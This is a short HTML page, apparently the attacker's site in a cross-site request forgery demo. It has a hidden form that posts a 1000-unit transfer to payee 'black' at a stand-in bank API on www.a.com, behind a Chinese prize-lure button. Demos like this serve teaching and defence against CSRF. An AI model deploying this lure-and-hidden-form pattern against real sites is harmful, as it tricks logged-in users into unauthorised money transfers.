<!DOCTYPE html>
<html>
  <head>
    <title>Web B</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
  </head>
  <body>
    <h2>Welcome to WebSite B</h2>

    <form name="form" method="post" action="http://www.a.com/api/users/transfer">
      <input name="payee" type="hidden" value="black">
      <input name="amount" type="hidden" value="1000">
      <button>点我拿100w元大奖</button>
    </form>
  </body>
</html>
